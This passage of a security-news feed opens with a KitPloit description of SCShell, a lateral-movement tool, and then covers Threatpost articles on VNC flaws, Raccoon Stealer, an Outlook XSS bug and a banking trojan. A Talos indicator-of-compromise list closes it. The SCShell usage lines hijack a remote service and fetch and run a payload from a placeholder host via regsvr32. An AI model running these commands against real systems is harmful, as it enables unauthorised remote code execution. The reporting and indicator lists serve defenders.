](<https://1.bp.blogspot.com/-15_k8d9kxEg/XdNX0HNOgQI/AAAAAAAAQ38/oh4AXndnQH0fQjsmvWOsRinh5kAldmf6QCNcBGAsYHQ/s1600/SCShell_1_network.png>)\n\n \n \n** Usage ** \nThe current build is written in ` C ` but I will port it to ` C# ` and ` PowerShell ` . \n\n \n \n Usage:\n SCShell.exe target service [payload](<https://www.kitploit.com/search/label/Payload> \"payload\" ) username domain password\n\n` target ` can be set to ` local ` to run the payload locally \nRemote execution \n\n \n \n SCShell.exe 192.168.197.131 XblAuthManager \"C:\\windows\\system32\\cmd.exe /c C:\\windows\\system32\\regsvr32.exe /s /n /u /i://your.website/payload.sct scrobj.dll\" administrator . Password\n\nI recommend using ` C:\\windows\\system32\\cmd.exe /c ` to make sure to payload will not be killed once the service stop. You NEED to use the full path. \nYou can also use a msbuild payload \n\n \n \n SCShell.exe 192.168.197.131 XblAuthManager \"C:\\windows\\system32\\cmd.exe /C C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\msbuild.exe C:\\payload.csproj\" administrator . Password\n SCShell ***\n Trying to connect to 192.168.197.131\n Username was provided attempting to call LogonUserA\n SC_HANDLE Manager 0x009ED250\n Opening XblAuthManager\n SC_HANDLE Service 0x009ED1B0\n Service path was changed to C:\\windows\\system32\\cmd.exe /C C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\msbuild.exe C:\\payload.csproj\n Service was started.\n\nI'm using the XblAuthManager as the target which is the Xbox Accessory [ Management ](<https://www.kitploit.com/search/label/Management> \"Management\" ) Service \n \n** Compiling from source ** \nThe code was compiled on [ Windows ](<https://www.kitploit.com/search/label/Windows> \"Windows\" ) using GCC Mingw compiler \n \n** Credit ** \nMr.Un1k0d3r RingZer0 Team \nTazz0 for the moral support \n \n \n\n\n** [ Download SCShell ](<https://github.com/Mr-Un1k0d3r/SCShell> \"Download SCShell\" ) **\n", "modified": "2019-11-21T12:30:11", "published": "2019-11-21T12:30:11", "id": "KITPLOIT:7044561031766565764", "href": "http://www.kitploit.com/2019/11/scshell-fileless-lateral-movement-tool.html", "title": "SCShell - Fileless Lateral Movement Tool That Relies On ChangeServiceConfigA To Run Command", "type": "kitploit", "cvss": {"score": 0.0, "vector": "NONE"}}], "threatpost": [{"lastseen": "2019-11-22T19:54:33", "bulletinFamily": "info", "description": "The open-source Virtual Network Computing (VNC) project, often found in industrial environments, is plagued with 37 different memory-corruption vulnerabilities \u2013 many of which are critical in severity and some of which could result in remote code execution (RCE). According to researchers at Kaspersky, they potentially affect 600,000 web-accessible servers in systems that use the code.\n\nThe research looked into four popular VNC-based systems, LibVNC, UltraVNC, TightVNC1.X and TurboVNC, which are actively used in automated industrial facilities to enable remote control of systems, according to the firm. Approximately 32 percent of industrial network computers having some form of [remote administration tools](<https://threatpost.com/trickbot-remote-desktop/141879/>), including VNC.\n\n\u201cThe prevalence of such systems in general, and particularly ones that are vulnerable, is a significant issue for the industrial sector as potential damages can bring significant losses through disruption of complex production processes,\u201d Kaspersky researchers wrote in an analysis of the bugs for ICS CERT, [released Friday](<https://ics-cert.kaspersky.com/reports/2019/11/22/vnc-vulnerability-research/>).\n\n[![](https://media.threatpost.com/wp-content/uploads/sites/103/2019/02/19151457/subscribe2.jpg)](<https://threatpost.com/newsletter-sign/>)\n\nKasperksy found vulnerabilities not only in the client, but also on the server-side of the system; many of the latter however can only be exploited after password authentication. Across all 37 bugs, there are two main attack vectors, the firm said: \u201cAn attacker is on the same network with the VNC server and attacks it to gain the ability to execute code on the server with the server\u2019s privileges; [or] a user connects to an attacker\u2019s \u2018server\u2019 using a VNC client and the attacker exploits vulnerabilities in the client to attack the user and execute code on the user\u2019s machine.\u201d\n\nA significant number of the problems detailed in the research were found and reported last year; however, each of the projects examined also had newly discovered bugs.\n\nFor instance, a newly found critical (9.8 out of 10 on the CVSS v.3 severity rating scale) database stack buffer overflow vulnerability in the TurboVNC server code could result in RCE. The issue ([CVE-2019-15683](<https://nvd.nist.gov/vuln/detail/CVE-2019-15683>)) exists because the stack frame is not protected with a stack canary. However, to exploit the bug, authorization on the server is required.\n\n\u201cSome compilers perform\u2026optimizations by removing stack canary checks from the functions that don\u2019t have explicitly allocated arrays,\u201d according to the research. \u201cHowever, the compiler could make a mistake and fail to check for the presence of a buffer in some of the structures on the stack or in switch-case statements.\u201d\n\nAlso, a critical integer-overflow vulnerability ([CVE-2018-15361](<https://nvd.nist.gov/vuln/detail/CVE-2018-15361>)) exists in UltraVNC client-side code. This is also critical, with a CVSS rating of 9.8 out of 10, and can be exploited to cause a denial-of-service state. Researchers also \u201cwouldn\u2019t rule out that experts in exploiting the Windows userland heap could turn this vulnerability into an RCE if they wanted to.\u201d\n\n\u201cIf an integer overflow occurs when allocating m_desktopName and the buffer is allocated on the regular heap of the process, this will make it possible to write the null byte to the previous chunk,\u201d according to the research. \u201cIf an integer overflow does not occur and the system has sufficient memory, a large buffer will be allocated, with a new heap allocated for it. With the right parameters, a remote attacker would be able to write a null byte to the _NT_HEAP structure, which will be located directly before a huge chunk.\u201d\n\nMeanwhile, the [CVE-2019-8262](<https://nvd.nist.gov/vuln/detail/CVE-2019-8262>) critical vulnerability (with a CVSS score of 9.8 out of 10) was identified in the handler of data encoded using the UltraVNC encoding function that could cause information disclosure.\n\n\u201cThe uninitialized variable new_len is passed to the lzo1x_decompress function,\u201d according to the research. \u201cAt the time of calling the function, the variable should be equal to the length of the m_zlibbuf buffer\u2026since the variable new_len was not initialized, it contained a large text section address value. This made it possible for a remote user to pass specially crafted data to the decompression function as inputs to ensure that the function, when writing to the m_zlibbuf buffer, would write the data beyond the buffer\u2019s boundary, resulting in heap overflow.\u201d\n\nIn TightVNC code version 1.3.10, there\u2019s a critical global buffer overflow ([CVE-2019-8287](<https://nvd.nist.gov/vuln/detail/CVE-2019-8287#vulnCurrentDescriptionTitle>)) in HandleCoRREBBP macro function, also with a CVSS rating of 9.8 out of 10. This can also potentially result RCE, Kaspersky found.\n\nResearchers also recently found a high-severity flaw in LibVNC ([CVE-2019-15681](<https://nvd.nist.gov/vuln/detail/CVE-2019-15681>)), with a CVSS rating of 7.7 out of 10. It involves a memory leak exploitable via network connectivity in the VNC server code, which allows an attacker to read stack memory and can be abused for information disclosure. According to the advisory, combined with another vulnerability, it can be used to leak stack memory and bypass ASLR.\n\nWorryingly, some of the bugs had been incorporated into the VNC code for years, meaning that projects built on it have \u201cinherited\u201d the issues.\n\n\u201cI was surprised to see the simplicity of discovered vulnerabilities, especially considering their significant lifetime,\u201d said Pavel Cheremushkin, Kaspersky ICS CERT vulnerability researcher, in a media statement. \u201cThis means that attackers could have noticed and taken advantage of the vulnerabilities a long time ago. Moreover, some classes of vulnerabilities are present in many open-source projects and remain there even after refactoring of the [main] codebase.\u201d\n\nKaspersky contacted the affected developers, and patches have been issued for supported products, it said. TightVNC for instance has discontinued the development of the TightVNC 1.X line and considers it end of life, so the bugs won\u2019t be patched.\n\n_**Is MFA enough to protect modern enterprises in the peak era of data breaches? How can you truly secure consumer accounts? Prevent account takeover? Find out: Catch our free, on-demand **_[_**Threatpost webinar**_](<https://attendee.gotowebinar.com/register/3127445778613605890?source=post>)_**, \u201cTrends in Fortune 1000 Breach Exposure\u201d to hear advice from breach expert Chip Witt of SpyCloud. **_[_**Click here to register**_](<https://attendee.gotowebinar.com/register/3127445778613605890?source=post>)_**.**_\n", "modified": "2019-11-22T19:50:14", "published": "2019-11-22T19:50:14", "id": "THREATPOST:8F6E27B46891F0167D7799A73F1A9380", "href": "https://threatpost.com/critical-flaws-vnc-industrial/150568/", "type": "threatpost", "title": "Critical Flaws in VNC Threaten Industrial Environments", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-11-22T13:44:22", "bulletinFamily": "info", "description": "Criminals behind malware dubbed Raccoon Stealer have adopted a simple and effective technique to circumvent Microsoft and Symantec anti-spam messaging gateways. The technique has been used in a recent campaign targeting financial institutions via business email compromise (BEC) attacks.\n\nAccording to a [Cofense report posted Thursday](<https://cofense.com/raccoon-stealer-found-rummaging-past-symantec-microsoft-gateways/>), the malware is delivered inside an .IMG file hosted on a hacker-controlled Dropbox account.\n\n\u201cUsing the familiar theme of a wire transfer\u2014closely akin to those often seen in business email compromise scams\u2014the threat actors look to trick users into opening the Dropbox URL and downloading the malicious file,\u201d wrote Cofense authors Max Gannon and Alan Rainer. \n[![](https://media.threatpost.com/wp-content/uploads/sites/103/2019/02/19151457/subscribe2.jpg)](<https://threatpost.com/newsletter-sign/>) \nWhat makes the Raccoon Stealer interesting to researchers is that it is new, easy-to-use and under active development by the hackers behind it. Cofense said the malware was first spotted in April of 2019 and since then has been leveraged in several different campaigns.\n\nThe malware is sold on underground forums in both Russian and English and includes around-the-clock customer support, Cofense said.\n\nAccording to research published in October by Cybereason, the malware has infected hundreds of thousands of Windows systems since April. Researchers there said developers behind the Raccoon Stealer charge $200 months for it use.\n\n\u201cIn this most recent campaign, a potentially compromised email account was used to send the email,\u201d researchers at Cofense wrote. Those messages managed to make it past Symantec Email Security and Microsoft EOP gateways \u201cwithout the URL being removed or tampered with to the extent that it would prevent victims from clicking on it and downloading the payload.\u201d\n\nBecause of the malware\u2019s flexibility to deliver a variety of payloads the Raccoon Stealer is gaining traction in underground markets, said researchers.\n\n**Tricky Raccoons**\n\nIn previous campaigns, Cofense researchers said the Raccoon Stealer malware has hid inside RFT document attachments and targeted the utilities sector. In those campaigns, adversaries behind the attacks attempted to leverage a known Microsoft Office remote code execution vulnerability ([CVE-2017-8570](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8570>)) that dates back to 2017.\n\n\u201cAlthough not particularly advanced or subtle with its network activity and processes, the malware can quickly gather and exfiltrate data as well as download additional payloads,\u201d researchers wrote.\n\nThe Raccoon Stealer malware has also been leveraged by attackers behind the Fallout exploit kit. [Over the summer](<https://www.bitdefender.com/files/News/CaseStudies/study/289/Bitdefender-WhitePaper-Fallout.pdf>), researchers at Bitdefender observed malicious online ads being used to deliver Raccoon Stealer to vulnerable systems. Exfiltrated from those endpoints were login credentials, auto-fill information and cookies from the Google Chrome and Mozilla browsers. Also stolen were credential for various crypto wallets.\n\n\u201cGiven the variety of delivery options, Raccoon Stealer could be a problem for organizations that focus too much on one infection vector,\u201d Cofense researchers said.\n\n_**Is MFA enough to protect modern enterprises in the peak era of data breaches? How can you truly secure consumer accounts? Prevent account takeover? Find out: Catch our free, on-demand **_[_**Threatpost webinar**_](<https://attendee.gotowebinar.com/register/3127445778613605890?source=post>)_**, \u201cTrends in Fortune 1000 Breach Exposure\u201d to hear advice from breach expert Chip Witt of SpyCloud. **_[_**Click here to register**_](<https://attendee.gotowebinar.com/register/3127445778613605890?source=post>)_**.**_\n", "modified": "2019-11-22T13:32:10", "published": "2019-11-22T13:32:10", "id": "THREATPOST:C0A58646680EABD23F9ABE6CC20F9F2E", "href": "https://threatpost.com/raccoon-stealer-malware-scurries-past-microsoft-messaging-gateways/150545/", "type": "threatpost", "title": "Raccoon Stealer Malware Scurries Past Microsoft Messaging Gateways", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-11-21T19:18:24", "bulletinFamily": "info", "description": "Users of the Microsoft Outlook for Android app should update their apps to avoid a range of attacks.\n\nThe bug (CVE-2019-1460) would allow an attacker to perform cross-site scripting (XSS) attacks on the affected systems and run scripts in the security context of the current user, according to Microsoft\u2019s [advisory on the bug](<https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/CVE-2019-1460#ID0EA>). XSS occurs when malicious parties [inject client-side scripts](<https://www.owasp.org/index.php/Cross-site_Scripting_\$XSS\$>) into web pages, which trick the unsuspecting user\u2019s browser into thinking that the script came from a trusted source.\n\nIn this case, the computing giant said that the issue exists in the way Microsoft Outlook for Android software parses specifically crafted email messages \u2013 thus, an attacker could exploit the vulnerability by sending just such an email. Czech firm Cybersecurity Help said in a [posting this week](<https://www.tenforums.com/windows-10-news/144873-cve-2019-1460-outlook-android-spoofing-vulnerability.html#post1774661>) that the problem was an \u201cImproper Neutralization of Input During Web Page Generation\u201d problem that exists due to insufficient sanitization of user-supplied data.\n\n[![](https://media.threatpost.com/wp-content/uploads/sites/103/2019/02/19151457/subscribe2.jpg)](<https://threatpost.com/newsletter-sign/>)\n\nThe adversary would need to be authenticated to the same network as the potential victim in order to carry out an attack, Microsoft said.\n\nA [write-up by Symantec](<https://www.symantec.com/security-center/vulnerabilities/writeup/110911?om_rssid=sr-advisories>) said that an attacker can exploit this issue to conduct spoofing attacks, while Cybersecurity Help added that an attacker could \u201csteal potentially sensitive information, change appearance of the web page, perform phishing and drive-by-download attacks.\u201d\n\nUsers should ensure that they have the [latest version of the app](<https://play.google.com/store/apps/details?id=com.microsoft.office.outlook>), and update it manually if they haven\u2019t received an auto-update.\n\nBeyond installing that update, Symantec also noted that mitigation includes running the software as a nonprivileged user with minimal access rights.\n\nResearcher Rafael Pablos was credited with finding the bug, which Microsoft rates as \u201cimportant\u201d in severity. It\u2019s listed as having a 5.6 out of 10 severity rating on the CVSS v.3 vulnerability rating scale.\n\n_**Is MFA enough to protect modern enterprises in the peak era of data breaches? How can you truly secure consumer accounts? Prevent account takeover? Find out: Catch our free, on-demand **_[_**Threatpost webinar**_](<https://attendee.gotowebinar.com/register/3127445778613605890?source=post>)_**, \u201cTrends in Fortune 1000 Breach Exposure\u201d to hear advice from breach expert Chip Witt of SpyCloud. **_[_**Click here to register**_](<https://attendee.gotowebinar.com/register/3127445778613605890?source=post>)_**.**_\n", "modified": "2019-11-21T19:15:17", "published": "2019-11-21T19:15:17", "id": "THREATPOST:597800CEAF4F4832B357C491661792B5", "href": "https://threatpost.com/microsoft-outlook-android-bug-xss/150528/", "type": "threatpost", "title": "Microsoft Outlook for Android Bug Opens Door to XSS", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2019-11-21T16:38:32", "bulletinFamily": "info", "description": "A new custom mobile banking malware for Android, dubbed Gnip, has emerged onto the scene, and its authors have taken an aggressive development track: Gnip appears to have been cobbled together in under five months, with four different variants already circulating \u2014 including a sample released in November that includes part of the Anubis trojan\u2019s source code.\n\nThough Gnip was spotted for the first time at the end of October 2019,\u201dit dates back to June 2019 [and] is still under active development\u2026first built from scratch but has been enriched through regular updates, the last of which did include some code copied from the infamous Anubis banking trojan,\u201d according to research from ThreatFabric. \u201cThis [indicates] that its author is cherry-picking the most relevant functionalities for its malware.\u201d\n\nAmong those functionalities seen in the latest version is a two-screen overlay approach to impersonate banks, the firm said. When an infected victim opens a mobile banking app, the malware dynamically brings up the overlay windows fetched from its command-and-control (C2) server, which mimic the real app. The first screen asks for login credentials, while the second steals the credit-card details.\n\n[![](https://media.threatpost.com/wp-content/uploads/sites/103/2019/02/19151457/subscribe2.jpg)](<https://threatpost.com/newsletter-sign/>)\n\n\u201cAlthough two-step overlays are not something new, their usage is generally limited to avoid raising suspicions,\u201d researchers said, [in a posting](<https://www.threatfabric.com/blogs/ginp_a_malware_patchwork_borrowing_from_anubis.html>) on Thursday.\n\n## Four Versions, Ongoing Development\n\nGnip has gone through four iterations, each adding significant advancements.\n\nThe analysis pointed out that the trojan began life as a fake \u201cGoogle Play Verificator\u201d app; if downloaded, it performed a simple SMS stealer function, intercepting texts and sending them to its C2. In August, a second version emerged \u2013 this time purporting to be Adobe Flash Player \u2013 containing additional, banking-specific features.\n\n\u201cThe malware was able to perform overlay attacks and become the default SMS app through the abuse of the Accessibility service,\u201d according to the posting. \u201cThe overlay consisted of a generic credit-card grabber targeting social and utility apps: Google Play, Facebook, WhatsApp, Chrome, Skype, Instagram and Twitter.\u201d\n\nA third version of the malware was released shortly thereafter, with enhanced payload obfuscation, ThreatFabric said. Also, \u201ca new endpoint was added to the Trojan allowing it to handle the card-grabber overlay and specific target (banking apps) overlay separately. In addition, the credit-card grabber target list was expanded with Snapchat and Viber.\u201d\n\nThe most recent version of Ginp was detected this month \u2013 this time enhanced with parts of the leaked source code of the infamous Anubis trojan (named after the Egyptian god of the dead). ThreatFabric [has previously reported](<https://threatpost.com/cerberus-android-malware-rental/147280/>) a surge in Anubis-based samples in the wild, \u201cafter the Anubis actor was allegedly arrested and the source code was leaked\u201d earlier this year.\n\nIn Gnip\u2019s case, the firm said that the malware incorporates Anubis\u2019 names used for Android components, its way of handling configuration values using SharedPreferences, and some of the keys used are identical to others used by Anubis.\n\n## Current and Future Features\n\nWhen the latest version of the malware is first started on the device, it hides its icon from the app drawer, making it invisible to the end user, according to ThreatFabric\u2019s breakdown. Then, it asks for Accessibility Service privileges. If a user clicks \u201callow,\u201d Ginp will go on to give itself permissions to send messages and make calls, and it is then ready to perform overlays.\n\nThis fourth version also moves away from targeting social apps and instead focuses strictly on banking applications; and it has changed its geo-targeting to focus strictly on Spanish banks. In all, ThreatFabric found that there are 24 targeted apps belong to seven different Spanish banks (Caixa Bank, Bankinter, Bankia, BBVA, EVO Banco, Kutxabank and Santander).\n\nGoing forward, ThreatFabric said that expects that some of the other code from the Anubis trojan could be added to Gnip, such as a back-connect proxy, screen-streaming capabilities and remote access trojan (RAT) capabilities \u2013 these would turn it into a full-fledged spyware. Also, the social media and other apps previously targeted in older variants could be added back into the grabber target list in the future, such as: Chrome, Facebook, Instagram, Skype, Snapchat, Twitter, Viber and WhatsApp.\n\n\u201cIn a five-month timespan, actors managed to create a trojan from scratch, which will presumably continue evolving by offering additional features such as but not limited to keylogging, back-connect proxy or RAT capabilities,\u201d researchers said. \u201cAlthough the actual targets are Spanish banking applications, looking at the path used in the inject requests, it is noticeable that the path of the overlays includes the country code of the target institution. This could indicate that actor(s) already have plans in expanding the target to applications from different countries and regions.\u201d\n\n_**Is MFA enough to protect modern enterprises in the peak era of data breaches? How can you truly secure consumer accounts? Prevent account takeover? Find out: Catch our free, on-demand **_[_**Threatpost webinar**_](<https://attendee.gotowebinar.com/register/3127445778613605890?source=post>)_**, \u201cTrends in Fortune 1000 Breach Exposure\u201d to hear advice from breach expert Chip Witt of SpyCloud. **_[_**Click here to register**_](<https://attendee.gotowebinar.com/register/3127445778613605890?source=post>)_**.**_\n", "modified": "2019-11-21T16:35:13", "published": "2019-11-21T16:35:13", "id": "THREATPOST:E00DA222DAC876747F9911778DDC997F", "href": "https://threatpost.com/gnip-banking-trojan-aggressive-development/150521/", "type": "threatpost", "title": "Gnip Banking Trojan Shows Ongoing, Aggressive Development", "cvss": {"score": 0.0, "vector": "NONE"}}], "talosblog": [{"lastseen": "2019-11-22T18:23:53", "bulletinFamily": "blog", "description": "[![](https://1.bp.blogspot.com/-YY2FQl9WGXA/XURYSq-inGI/AAAAAAAAACc/Ko8Q3jzMHrs2tIOdnt-yO6QVWhNtZBrPwCLcBGAs/s1600/recurring%2Bblog%2Bimages_threat%2Broundup.jpg)](<https://1.bp.blogspot.com/-YY2FQl9WGXA/XURYSq-inGI/AAAAAAAAACc/Ko8Q3jzMHrs2tIOdnt-yO6QVWhNtZBrPwCLcBGAs/s1600/recurring%2Bblog%2Bimages_threat%2Broundup.jpg>)\n\nToday, Talos is publishing a glimpse into the most prevalent threats we've observed between Nov. 15 and Nov. 22. As with previous roundups, this post isn't meant to be an in-depth analysis. Instead, this post will summarize the threats we've observed by highlighting key behavioral characteristics, indicators of compromise, and discussing how our customers are automatically protected from these threats. \n \nAs a reminder, the information provided for the following threats in this post is non-exhaustive and current as of the date of publication. Additionally, please keep in mind that IOC searching is only one part of threat hunting. Spotting a single IOC does not necessarily indicate maliciousness. Detection and coverage for the following threats is subject to updates, pending additional threat or vulnerability analysis. For the most current information, please refer to your Firepower Management Center, Snort.org, or ClamAV.net. \n \nFor each threat described below, this blog post only lists 25 of the associated file hashes and up to 25 IOCs for each category. An accompanying JSON file can be found [here](<https://alln-extcloud-storage.cisco.com/blogs/blogs.cisco.com/2019/11/tru.json_.txt>)that includes the complete list of file hashes, as well as all other IOCs from this post. As always, please remember that all IOCs contained in this document are indicators, and one single IOC does not indicated maliciousness. \nThe most prevalent threats highlighted in this roundup are: \n \nThreat Name | Type | Description \n---|---|--- \nWin.Downloader.Nymaim-7391562-0 | Downloader | Nymaim is malware that can be used to deliver ransomware and other malicious payloads. It uses a domain generation algorithm to generate potential command and control (C2) domains to connect to additional payloads. \nWin.Trojan.Bunitu-7394346-0 | Trojan | Bunitu is malware that establishes a persistent foothold on an infected machine and then turns it into a proxy for criminal VPN services. \nWin.Malware.Trickbot-7394707-1 | Malware | Trickbot is a banking trojan targeting sensitive information for select financial institutions. This malware is frequently distributed through malicious spam campaigns. Many of these campaigns rely on downloaders for distribution, such as VB scripts. \nWin.Worm.Vobfus-7395002-0 | Worm | Vobfus is a worm that copies itself to external drives and attempts to gain automatic code execution via autorun.inf files. It also modifies the registry so that it will launch when the system is booted. Once installed, it attempts to download follow-on malware from its C2 server. \nWin.Malware.DarkComet-7395004-1 | Malware | DarkComet and related variants are a family of RATs designed to provide an attacker with control over an infected system. Capabilities of this malware include the ability to download files from a user's machine, mechanisms for persistence and hiding, and the ability to send back usernames and passwords from the infected system. \nWin.Ransomware.Cerber-7395321-0 | Ransomware | Cerber is ransomware that encrypts documents, photos, databases and other important files. Historically, this malware would replace files with encrypted versions and add the file extension \".cerber,\" although in more recent campaigns, this is no longer the case. \nWin.Dropper.Remcos-7395733-0 | Dropper | Remcos is a remote access trojan (RAT) that allows attackers to execute commands on the infected host, log keystrokes, interact with a webcam, and capture screenshots. It is commonly delivered through Microsoft Office documents with macros, sent as attachments on malicious emails. \nWin.Dropper.Tofsee-7402230-0 | Dropper | Tofsee is multipurpose malware that features several modules used to carry out malicious activities, such as sending spam messages, conducting click fraud, mining cryptocurrency and more. Infected systems become part of the Tofsee spam botnet and are used to send large volumes of spam messages in an effort to infect additional systems and increase the overall size of the botnet under the operator\u2019s control. \n \n* * *\n\n## Threat Breakdown\n\n### Win.Downloader.Nymaim-7391562-0\n\n#### Indicators of Compromise\n\nRegistry Keys | Occurrences \n---|--- \n`<HKCU>\\SOFTWARE\\MICROSOFT\\GOCFK ` | 25 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\KPQL ` | 25 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\GOCFK \nValue Name: mbijg ` | 25 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\KPQL \nValue Name: efp ` | 25 \nMutexes | Occurrences \n---|--- \n`Local\\{369514D7-C789-5986-2D19-AB81D1DD3BA1}` | 25 \n`Local\\{D0BDC0D1-57A4-C2CF-6C93-0085B58FFA2A}` | 25 \n`Local\\{D8E7AB94-6F65-71DE-8DA1-FE621BE2E606}` | 25 \n`Local\\{F04311D2-A565-19AE-AB73-281BA7FE97B5}` | 25 \n`Local\\{F6F578C7-92FE-B7B1-40CF-049F3710A368}` | 25 \n`Local\\{0F53A50D-AEA8-402A-580B-3C32A490301E}` | 25 \n`Local\\{42FDAA48-39A4-4464-9CC4-6F1A48111B12}` | 25 \nDomain Names contacted by malware. Does not indicate maliciousness | Occurrences \n---|--- \n`sqmgdts[.]net` | 25 \n`wneeuc[.]in` | 25 \n`jiwlzenl[.]com` | 25 \n`zgzaztmi[.]com` | 25 \n`amkqrprvei[.]com` | 25 \n`srbhfbemi[.]pw` | 25 \n`yoekgdnoyej[.]in` | 25 \n`scwafgfxlr[.]net` | 25 \n`grnorxacnw[.]com` | 25 \n`futzruakw[.]pw` | 25 \n`dhcfsfxgb[.]net` | 25 \n`lmgsmlhidh[.]net` | 25 \n`fpmuefeozs[.]in` | 25 \n`wjpbf[.]net` | 25 \n`yfuoixdwjxpy[.]pw` | 25 \n`sqwpuwoq[.]net` | 25 \n`wqjlwcnqbe[.]com` | 25 \n`tjjqmo[.]net` | 25 \n`bsztb[.]in` | 25 \n`gmznk[.]com` | 25 \n`cejwtluei[.]com` | 25 \n`rejfedtcd[.]net` | 25 \n`uktldpj[.]com` | 25 \n`aanpolaayjm[.]net` | 25 \n`rdipde[.]com` | 25 \n \n*See JSON for more IOCs\n\nFiles and or directories created | Occurrences \n---|--- \n`%ProgramData%\\ph` | 25 \n`%ProgramData%\\ph\\eqdw.dbc` | 25 \n`%ProgramData%\\ph\\fktiipx.ftf` | 25 \n`%TEMP%\\gocf.ksv` | 25 \n`%TEMP%\\kpqlnn.iuy` | 25 \n`%TEMP%\\fro.dfx` | 24 \n`%TEMP%\\npsosm.pan` | 24 \n`\\Documents and Settings\\All Users\\pxs\\dvf.evp` | 24 \n`\\Documents and Settings\\All Users\\pxs\\pil.ohu` | 24 \n \n#### File Hashes\n\n` 009c5d8c565ffc008a15040f7c1ce30a65321089606ad3e6e711e715e65ed5d3 043fd8c728078e4cc3402b65d216e224a482532faaa18dff9ce7baea068666a6 0c6cf23450cb8d2f982780d0b63b32f84c4cef5ed035b336198cfab945d7222f 0e2c7c4988f5d6b83aa46bfaec967e409310588fb31d41aaf752cd0cd1f61e07 159157544afea2dae4868b345f3ace9dbb3946dcdb051afda1f9d3de43b84b5b 27992098e220360f3a5896812a077ba611dce6936c7d8a93a8851b9498534483 2f625f48f37cc6d9ad56bf49690f578d345ca7938750614fce45a6db3ea94ee2 3b8723dccf6a910c012cba048918b741661a40bb9256356935af7dbf1c1417c4 3dccca8f309ddb9675ef1099afa48c99259af991603ffe82a83ad9516b5742f3 5c3ad5d944eb5911e73ced27779e8ecb6a555c64ace076998018e313c058c128 630b0e5f46a932762b7e569f0785e163db04a5e482a1b2c2469343439cd5f004 689c22dc80615221d5c64720f599a33eaa093e27aabcd89191fa446d5dcc8463 75d8010dab02726e712f1ba1cba34ae48d3aabf897c22caf258a552282c7cfa3 776186df1d180131e8272e9bed1901a10156c3f12adacd904b8023fe5f164b22 8837d607c0bf29f0855967de0cb3ac6e36c6418786e693dbcb92cce0addef532 8ad6d601b0d1e03dda4b01708e40fcbcc66e610c2b848f1662b26d70aa358cf6 8b75cc8eeff51a02702262472039bda60c892e0beba4f76d5b3262f1c1482081 8cb66655a63b931fd20483d5b347756980e2a5f1d70a66fb84819b1a10c82722 9c79e22684603ef09d8939a72827d9e39478e2583740f55d4a5f676a4d1cd30c a02dc770b986b1360c6534907f5c9ad368f7810da498a6df1e2bedd665db75ef a0977a0743fd97773d06407074172e2e763d5306310075b301833454204fecce a2eef697284f59a4306ad79669dcb9c1e095595cbf52a73a6775e90a34c790c4 a94e7042aea0920a02775452ec9f05ab07b7ae60a7c9466a2ce8eb8b5e40b428 aaa24779cd52e2685d6646ac379a1c102b8811f1d969e16c2d6b358d00a147ec ad3f4bd490dd4134e099d505123e528f858463a7e17989c258516c7d24ac3836 `\n\n*See JSON for more IOCs\n\n#### Coverage\n\nProduct | Protection \n---|--- \nAMP | ![This has coverage](https://www.talosintelligence.com/assets/icon_check_white.svg) \nCloudlock | N/A \nCWS | ![This has coverage](https://www.talosintelligence.com/assets/icon_check_white.svg) \nEmail Security | ![This has coverage](https://www.talosintelligence.com/assets/icon_check_white.svg) \nNetwork Security | ![This has coverage](https://www.talosintelligence.com/assets/icon_check_white.svg) \nStealthwatch | N/A \nStealthwatch Cloud | N/A \nThreat Grid | ![This has coverage](https://www.talosintelligence.com/assets/icon_check_white.svg) \nUmbrella | N/A \nWSA | ![This has coverage](https://www.talosintelligence.com/assets/icon_check_white.svg) \n \n#### Screenshots of Detection\n\n#### AMP\n\n[![](https://1.bp.blogspot.com/-dJQK21RVxuI/XdgSkbUbfVI/AAAAAAAAC6c/MZoblgpsix8XIvUo5UIjmOu1nS_ARpDPACLcBGAsYHQ/s400/3b8723dccf6a910c012cba048918b741661a40bb9256356935af7dbf1c1417c4_amp.png)](<https://1.bp.blogspot.com/-dJQK21RVxuI/XdgSkbUbfVI/AAAAAAAAC6c/MZoblgpsix8XIvUo5UIjmOu1nS_ARpDPACLcBGAsYHQ/s1600/3b8723dccf6a910c012cba048918b741661a40bb9256356935af7dbf1c1417c4_amp.png>)\n\n \n\n\n* * *\n\n### Win.Trojan.Bunitu-7394346-0\n\n#### Indicators of Compromise\n\nRegistry Keys | Occurrences \n---|--- \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\SHAREDACCESS\\PARAMETERS\\FIREWALLPOLICY\\STANDARDPROFILE\\AUTHORIZEDAPPLICATIONS\\LIST ` | 26 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\SHAREDACCESS\\PARAMETERS\\FIREWALLPOLICY\\STANDARDPROFILE\\AUTHORIZEDAPPLICATIONS\\LIST \nValue Name: C:\\Windows\\system32\\rundll32.exe ` | 25 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\WINLOGON\\NOTIFY ` | 25 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\WINLOGON\\NOTIFY\\DAOEMNI ` | 11 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\WINLOGON\\NOTIFY\\DAOEMNI \nValue Name: Impersonate ` | 11 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\WINLOGON\\NOTIFY\\DAOEMNI \nValue Name: Asynchronous ` | 11 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\WINLOGON\\NOTIFY\\DAOEMNI \nValue Name: MaxWait ` | 11 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\WINLOGON\\NOTIFY\\DAOEMNI \nValue Name: DllName ` | 11 